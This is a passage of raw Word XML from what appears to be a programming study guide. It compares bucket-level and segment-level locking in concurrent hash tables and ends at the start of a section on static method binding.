          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are both types of locking mechanisms used in hash-based data structures (like hash maps or hash tables) to manage concurrent access to shared data. These mechanisms help ensure thread safety and data consistency in multi-threaded environments. Here's a detailed explanation of the two:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BDF59D" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Bucket-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984767C"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inition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, each </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or individual slot) in the hash table has its own lock. A "bucket" typically refers to a location in the table that stores one or more key-value pairs, often implemented as a linked list or other data structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C21C7C"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CB85AE" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Locking is done at a fine-grained level, meaning that a thread will lock only the specific bucket that it is modifying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D44CBD" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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cy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach allows multiple threads to access different buckets simultaneously (if they are modifying different buckets), improving concurrency and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7390B10B" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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cking Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only the particular bucket being accessed is locked. Other buckets can still be accessed or modified by other threads concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E4F0A7" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since only individual buckets are locked, it reduces contention (fewer threads are blocked), leading to better performance when multiple threads are working on different buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F101AC"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dvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD9F681" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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igher concurrency compared to segment-level locking because each bucket can be accessed by different threads independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD29697" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ne-grained locking helps in achieving better throughput and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E81610"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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA363A4" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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naging multiple locks can be more complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33325FEC" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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multiple keys map to the same bucket (in case of hash collisions), it can still lead to contention within that bucket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96B64E" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Bucket-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DC9272"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agine a hash map where each bucket is a linked list of entries, and each list has a lock. Different threads can operate on different buckets without interference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAFD86" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Segment-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700CDCE9"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Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segment-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the hash table is divided into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segments</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and a single lock is used for each segment. Each segment contains a subset of the buckets. When a thread wants to access a bucket within a segment, it must acquire the lock for that segment, which locks all buckets within the segment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3883D1AD"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haracteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340FBD94" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Locking is done at a coarser level (the segment level), meaning that multiple buckets within the same segment are locked together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8A789" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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cy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple threads can access buckets in different segments simultaneously, but only one thread can access the buckets in a particular segment at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A702BA1" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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cking Scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All buckets within the segment are locked at once. So, even if a thread needs to access only one bucket within the segment, the entire segment is locked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4698CE" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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erformance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: While it provides better concurrency than global locking, it is not as efficient as bucket-level locking since threads accessing different buckets within the same segment are blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B60DE18"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dvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E350E98" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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mpler to manage than bucket-level locking, as fewer locks are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DA8D3" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ffective in scenarios where the hash table is split into segments that are less frequently accessed simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C264B2"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isadvantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439DC36D" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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wer concurrency compared to bucket-level locking because multiple buckets within a segment are locked together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165F005F" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reads accessing different buckets within the same segment cannot operate concurrently, which could cause contention and performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559DF2D5" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Segment-level Locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2779C9AB"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a hash table with 4 segments, if a thread wants to access a bucket in Segment 2, it needs to acquire the lock for Segment 2, which will lock all buckets in that segment. Threads accessing other segments can still run concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A7B5E" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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F67810">
          <v:rect id="_x0000_i1234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B7B40" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Differences Between Bucket-level and Segment-level Lock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5"/>
        <w:gridCol w:w="3503"/>
        <w:gridCol w:w="5396"/>
      </w:tblGrid>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="44C79B3D" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D3FF45" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36F4DCAC" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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Bucket-level Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AC28DD2" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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egment-level Locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="2DEC0BFA" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="389B46DB"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Granularity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FA1547"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ne-grained (lock per bucket)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100F16D8"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arse-grained (lock per segment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="606B1AC9" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53942F70"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cy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76ECCFAC"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igher concurrency (more independent access to buckets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E80094"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wer concurrency (locks entire segment, blocking other buckets in the same segment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="54C88FE8" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07EF75F4"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cking Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088CB875"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cks individual buckets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="198D176E"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cks all buckets within a segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="719DCE12" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4592EC"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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="612220D4"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tter performance in high-concurrency scenarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75524E96"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result in contention in scenarios where multiple threads access different buckets in the same segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="06AC45FF" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DF772DD"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lexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28FE5889"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re complex to manage multiple locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="409747DA"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mpler to manage fewer locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0028064B" w:rsidRPr="00CE4B95" w14:paraId="4CA489C0" w14:textId="77777777" w:rsidTr="00A76D6E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A060C46"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tention</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75119B97"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ess contention, unless there are hash collisions within a bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F8AD89B" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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re contention if multiple threads access the same segment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F45639D" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E"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to Use Which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040B6836" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ucket-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is preferred when you have a hash table with high concurrency demands and minimal collisions between keys. It is useful when you expect threads to access different buckets frequently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A9A1DB" w14:textId="77777777" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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gment-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is useful when your hash table is divided into logical partitions, and you want a simpler locking strategy, even at the cost of concurrency. It can be suitable in cases where you expect fewer simultaneous accesses to different segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46431DCB" w14:textId="3FE47E5E" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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957FF27">
          <v:rect id="_x0000_i1235" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15697079" w14:textId="58483329" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00332200" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc196307569"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is the static method bound with an object</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="28CE3CC7" w14:textId="1365DD4D" w:rsidR="00C564B7" w:rsidRPr="00CE4B95" w:rsidRDefault="00C564B7" w:rsidP="00042939">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w:t>
      </w:r>
